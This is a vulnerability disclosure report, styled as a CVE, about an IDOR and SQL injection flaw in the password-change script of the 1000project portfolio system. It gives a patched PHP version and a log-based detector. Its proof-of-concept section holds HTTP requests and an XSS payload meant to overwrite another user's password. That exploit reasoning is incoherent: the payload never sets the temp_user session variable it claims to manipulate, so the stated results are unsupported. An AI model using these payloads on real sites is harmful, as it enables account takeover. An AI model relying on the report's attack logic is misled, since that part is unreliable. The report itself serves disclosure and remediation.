
CVE Report: 1000project IDOR Vulnerability - Password Modification #4

@9str0IL

CVE Report: 1000project IDOR Vulnerability - Password Modification

Basic Information

  Title: [High] 1000project IDOR Vulnerability - Unauthorized Password Modification
  Product: 1000project (Portfolio Management System MCA)
  Vendor: 1000 Projects
  Affected Version: 1.0
  Severity: High (CVSS 3.1: 8.8)
  Reporter: 9str0il
  Discovery Date: 2026-04-10
  Disclosure Date: 2026-04-10
  References: https://github.com/1000projects/portfolio-management-system
  Software Link: https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

Vulnerability Description

A high-severity IDOR (Insecure Direct Object Reference) vulnerability exists in 1000project's update_passwd_process.php. The script takes the account whose password to change from the temp_user session variable, so an attacker who can influence that variable can change the password of any user account; no authorization check ties the target account to the currently logged-in user.

Key Characteristics:

  • Attack Vector: Session variable manipulation
  • Impact: Unauthorized password modification for any user
  • Authentication: Requires valid user session (but no additional authorization)

The vulnerability stems from the system using a session variable to identify the user whose password to change, without verifying that the current user has permission to modify that account.


Affected Component

  File: update_passwd_process.php
  Vulnerable Line: Line 18
  Vulnerable Variable: $_SESSION['temp_user']
  Attack Type: IDOR (Insecure Direct Object Reference)

Vulnerability Details

Vulnerable Code

File: update_passwd_process.php:10, 18

$uname = $_SESSION['temp_user'];

// Later in the code
$query = mysqli_query($con,"update reg_details set reg_passwd='$newpasswd' where reg_email='$uname'");

Root Cause

  1. Session Variable Trust: The system blindly trusts the temp_user session variable without verification
  2. Lack of Authorization: No check to ensure the current user has permission to modify the target account
  3. Direct Object Reference: Directly uses the session value to identify the user object without access control
  4. No Parameterization: Also contains an SQL injection vulnerability due to direct string concatenation

Attack Vector

  1. Attacker logs into their own account
  2. Attacker manipulates the temp_user session variable to contain another user's email
  3. Attacker submits a password change request
  4. The system changes the password for the email stored in temp_user (not the current user)
  5. Attacker gains access to the target user's account

CVSS 3.1 Vector String

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  Attack Vector (AV): Network - can be exploited over the network
  Attack Complexity (AC): Low - no special conditions required
  Privileges Required (PR): Low - requires a valid user session
  User Interaction (UI): None - no user interaction required
  Scope (S): Unchanged - does not affect other components
  Confidentiality (C): High - high impact on data confidentiality
  Integrity (I): High - high impact on data integrity
  Availability (A): None - no impact on availability

CWE Classification

  CWE ID: CWE-639
  CWE Name: Authorization Bypass Through User-Controlled Key
  CAPEC ID: CAPEC-639

Impact

  1. Account Takeover: Attackers can take control of any user account
  2. Data Breach: Attackers can access sensitive information from compromised accounts
  3. Privilege Escalation: Attackers can target admin accounts to gain elevated privileges
  4. Identity Theft: Personal information may be compromised
  5. Reputation Damage: Loss of user trust due to account compromises

Specific Attack Scenarios

Scenario 1: Admin Account Takeover

// Attacker manipulates session
$_SESSION['temp_user'] = "admin@example.com";
// Changes password for admin account

Scenario 2: Mass Password Changes

// Attacker could potentially change passwords for multiple users
// Through repeated session manipulation

Scenario 3: Data Exfiltration

// After taking over accounts, attacker can access
// Personal information, achievements, projects, etc.

Remediation

Recommended Fix

// update_passwd_process.php - FIXED VERSION

include("connection.php");
session_start();

// 1. Require an authenticated session. The account to update is the login
//    identity ($_SESSION['user'], set during login), never a separately
//    settable value such as temp_user.
if (!isset($_SESSION['user'])) {
    http_response_code(403);
    exit("Not authenticated.");
}

if (isset($_POST['change'])) {
    $newpasswd = $_POST['newpasswd'] ?? '';
    $cnpasswd = $_POST['cnpasswd'] ?? '';
    $current_user = $_SESSION['user'];

    if ($newpasswd !== $cnpasswd) {
        $_SESSION['change-passwd'] = "Password does not match. Please Provide valid one.";
        header("location:changepasswd.php");
        exit; // always stop after a redirect; otherwise the script keeps executing
    }
    else
    {
        // 2. Use prepared statements to prevent SQL injection: the email is
        //    bound as a parameter, so it can never alter the query text.
        //    reg_passwd is stored in the form the application's login expects;
        //    hashing it with password_hash() would also require changing login.
        $stmt = $con->prepare("UPDATE reg_details SET reg_passwd = ? WHERE reg_email = ?");
        $stmt->bind_param("ss", $newpasswd, $current_user);
        $result = $stmt->execute();
        $stmt->close();

        if($result){
            $_SESSION['pass-succ'] = "Password is changed successfully. You may login now.";
            header("location:changepasswd.php");
            exit;
        }
        else{
            $_SESSION['pass-err'] = "Something is wrong. Please try again later.";
            header("location:changepasswd.php");
            exit;
        }
    }
}

Additional Security Measures

  1. Session Management

    • Use session variables that cannot be easily manipulated
    • Store user identity securely in session
    • Implement session validation
  2. Access Control

    • Always verify user identity before allowing sensitive operations
    • Implement role-based access control
    • Log all password change attempts
  3. Input Validation

    • Validate all user input
    • Use prepared statements for all database operations
    • Implement password strength requirements
  4. Security Monitoring

    • Monitor for unusual password change patterns
    • Implement rate limiting for password change attempts
    • Alert on suspicious account activity
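The logging and monitoring items above say what to watch for but not how. As an added example (not code from this report or from the 1000project code base), the following Python detector runs over a constructed audit-log format, assumed here to record the authenticated session user and the account actually updated for each password-change attempt, and flags the two patterns this report describes: a change where the acting user differs from the target account (the CWE-639 indicator) and a burst of changes from one session (the mass password change scenario).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed audit-log format (hypothetical; 1000project writes no such log):
# one line per password-change attempt with the authenticated session user
# (actor) and the reg_email row that was updated (target).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) sid=(?P<sid>\S+) actor=(?P<actor>\S+) "
    r"target=(?P<target>\S+) result=(?P<result>\S+)$"
)
SAMPLE_LOG = """\
2026-04-10T10:00:01Z sid=s1 actor=alice@example.com target=alice@example.com result=ok
2026-04-10T10:05:12Z sid=s2 actor=mallory@example.com target=admin@example.com result=ok
2026-04-10T10:05:20Z sid=s2 actor=mallory@example.com target=bob@example.com result=ok
2026-04-10T10:05:31Z sid=s2 actor=mallory@example.com target=carol@example.com result=ok
2026-04-10T11:00:00Z sid=s3 actor=bob@example.com target=bob@example.com result=mismatch
"""

def parse(log_text):
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the detector
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events

def detect(log_text, burst_threshold=3, window=timedelta(seconds=60)):
    events = parse(log_text)
    alerts = []
    # Pattern 1: session user differs from the account being changed (CWE-639).
    for ev in events:
        if ev["actor"] != ev["target"]:
            alerts.append(("cross_account", ev["sid"], ev["target"]))
    # Pattern 2: several successful changes from one session in a short window
    # (the "mass password changes" scenario); reported once per session.
    by_sid = defaultdict(list)
    for ev in events:
        if ev["result"] == "ok":
            by_sid[ev["sid"]].append(ev["ts"])
    for sid, times in sorted(by_sid.items()):
        times.sort()
        for i, start in enumerate(times):
            n = sum(1 for t in times[i:] if t - start <= window)
            if n >= burst_threshold:
                alerts.append(("burst", sid, n))
                break
    return alerts
```

With the fixed handler in place the cross_account alert should never fire, so any hit is worth investigating as a regression or a forged session.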

Proof of Concept (PoC)

Normal Password Change

# Normal password change request
POST /update_passwd_process.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=user_session

newpasswd=newpassword123&cnpasswd=newpassword123&change=Change

# Result: Current user's password changed

IDOR Attack - Change Admin Password

# Step 1: Attacker logs in as regular user
# Step 2: Attacker manipulates session (e.g., through XSS or session fixation)
# Step 3: Attacker submits password change request

POST /update_passwd_process.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=hacked_session

newpasswd=attackerpassword&cnpasswd=attackerpassword&change=Change

# Result: Admin's password changed to attacker's chosen password

Attack via XSS

<!-- XSS payload to manipulate session -->
<script>
// Inject via XSS vulnerability
document.cookie = "PHPSESSID=attacker_session";
// Manipulate temp_user session variable
fetch('/update_passwd_process.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'newpasswd=hacked&cnpasswd=hacked&change=Change'
});
</script>

Timeline

  2026-04-10: Vulnerability discovered during code audit
  2026-04-10: CVE report drafted
  TBD: Vendor notification
  TBD: Patch released
  TBD: Public disclosure

References

  1. https://github.com/1000projects/portfolio-management-system
  2. https://cwe.mitre.org/data/definitions/639.html
  3. https://owasp.org/www-community/attacks/Insecure_Direct_Object_References
  4. https://capec.mitre.org/data/definitions/639.html
  5. https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

Credits

Discovered by 9str0il during a security code audit.


Disclaimer: This vulnerability report is submitted for responsible disclosure. The reporter is not responsible for any misuse of this information.
